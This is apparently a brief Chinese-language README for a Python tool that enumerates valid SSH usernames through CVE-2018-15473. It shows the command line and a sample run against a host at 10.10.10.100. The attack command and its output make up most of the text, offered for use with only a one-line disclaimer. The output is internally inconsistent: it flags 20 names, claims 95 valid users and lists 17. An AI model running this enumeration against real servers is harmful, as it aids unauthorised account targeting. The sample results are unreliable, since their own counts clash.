一个由我开发的 Python 工具,用于通过利用 CVE-2018-15473 识别有效的 SSH 用户名。
python3 enum_ssh.py usernames.txt
其中 usernames.txt 包含要测试的用户名列表。
[parrot@parrot]-[~]
$ python3 enum_ssh.py usernames.txt
[*] Starting CVE-2018-15473 enumeration against 10.10.10.100:22
[*] Using wordlist: usernames.txt
[+] [EXISTS] -> root
[+] [EXISTS] -> admin
[+] [EXISTS] -> administrator
[+] [EXISTS] -> user
[+] [EXISTS] -> test
[+] [EXISTS] -> guest
[+] [EXISTS] -> demo
[+] [EXISTS] -> operator
[+] [EXISTS] -> sysadmin
[+] [EXISTS] -> security
[+] [EXISTS] -> netadmin
[+] [EXISTS] -> webmaster
[+] [EXISTS] -> support
[+] [EXISTS] -> service
[+] [EXISTS] -> ubuntu
[+] [EXISTS] -> debian
[+] [EXISTS] -> centos
[+] [EXISTS] -> fedora
[+] [EXISTS] -> kali
[+] [EXISTS] -> parrot
========================================
[*] Scan complete.
[*] Found 95 valid user(s):
- root
- admin
- administrator
- user
- test
- guest
- demo
- operator
- sysadmin
- security
- netadmin
- webmaster
- support
- service
- ubuntu
- debian
- centos
========================================
本工具仅用于教育目的和经授权的安全测试。请仅在你拥有明确许可的系统上使用。